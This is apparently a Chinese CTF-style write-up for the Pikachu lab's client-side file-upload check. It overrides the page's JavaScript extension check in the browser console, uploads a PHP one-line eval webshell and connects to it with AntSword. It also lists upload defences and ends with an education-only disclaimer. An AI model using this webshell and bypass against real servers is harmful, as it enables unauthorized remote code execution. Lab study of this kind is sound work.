【CTF Web】Pikachu 客户端check Writeup（文件上传+代码审计+JS分析）

不安全的文件上传漏洞概述

文件上传功能在web应用系统很常见，比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后，后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上传的文件没有进行任何的安全判断或者判断条件不够严谨，则攻击着可能会上传一些恶意的文件，比如一句话木马，从而导致后台服务器被webshell。
所以，在设计文件上传功能时，一定要对传进来的文件进行严格的安全考虑。比如：
–验证文件类型、后缀名、大小;
–验证文件的上传方式;
–对文件进行一定复杂的重命名;
–不要暴露文件上传后的路径;
–等等…
你可以通过“Unsafe file upload”对应的测试栏目，来进一步的了解该漏洞。

提示

一切在前端做的安全措施都是不靠谱的

---

解法

上传一句话木马。

<?php @eval($_POST['a']); ?>

审查元素。

<div class="page-content">
            <div id="usu_main">
                <p class="title">这里只允许上传图片o！</p>
                <form class="upload" method="post" enctype="multipart/form-data" action="">
                    <input class="uploadfile" type="file" name="uploadfile" onchange="checkFileExt(this.value)"><br>
                    <input class="sub" type="submit" name="submit" value="开始上传">
                </form>
                            </div>

        </div>

通过 checkFileExt(this.value) 函数检查文件类型。

<script>
    function checkFileExt(filename)
    {
        var flag = false; //状态
        var arr = ["jpg","png","gif"];
        //取出上传文件的扩展名
        var index = filename.lastIndexOf(".");
        var ext = filename.substr(index+1);
        //比较
        for(var i=0;i<arr.length;i++)
        {
            if(ext == arr[i])
            {
                flag = true; //一旦找到合适的，立即退出循环
                break;
            }
        }
        //条件判断
        if(!flag)
        {
            alert("上传的文件不符合要求，请重新选择！");
            location.reload(true);
        }
    }
</script>

在控制台重新定义该函数。

function checkFileExt(filename) {return true;}

再次上传一句话木马。上传成功。

用蚁剑连接。

---

声明

本博客上发布的所有关于网络攻防技术的文章，仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行，并且严格遵守了相关法律法规。

博主坚决反对任何形式的非法黑客行为，包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时，必须遵守法律法规，不得用于任何非法目的。对于因使用这些技术而导致的任何后果，博主不承担任何责任。